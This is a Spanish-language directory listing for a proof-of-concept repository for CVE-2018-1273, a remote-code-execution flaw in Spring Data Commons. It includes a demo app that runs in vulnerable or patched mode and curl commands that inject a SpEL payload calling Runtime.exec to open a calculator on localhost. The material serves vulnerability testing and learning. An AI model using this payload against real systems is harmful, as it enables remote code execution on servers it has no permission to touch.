Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc-cve-2018-1273 — POC para CVE-2018-1273 | Kitploit
Herramientas/GitHubGitHub/wearearima/poc-cve-2018-1273
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubwearearima/poc-cve-2018-1273

poc-cve-2018-1273

POC para CVE-2018-1273

Ver Repositorio
24101hace 8 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-1273

Spring Data Commons, versiones anteriores a 1.13 hasta 1.13.10, 2.0 hasta 2.0.5, y versiones antiguas no soportadas, contienen una vulnerabilidad de enlace de propiedades causada por una neutralización incorrecta de elementos especiales. Un usuario malicioso remoto no autenticado (o atacante) puede suministrar parámetros de solicitud especialmente diseñados contra recursos HTTP respaldados por Spring Data REST o utilizando el enlace de carga útil de solicitud basado en proyecciones de Spring Data que puede conducir a un ataque de ejecución remota de código.

Más información aquí

Ejecución

La aplicación se puede probar con la versión vulnerable o la versión corregida de Spring Data Commons.

  • Versión vulnerable (por defecto):
root@kitploit:~
mvn spring-boot:run
  • Versión corregida:
root@kitploit:~
mvn spring-boot:run -Dfixed

Prueba de la vulnerabilidad

Ejecute el siguiente comando para comprobar si la vulnerabilidad puede ser explotada:

  • En Windows:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • En macOS:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

Descargar herramienta

Créditos

Creado por https://www.arima.eu

ARIMA Software Design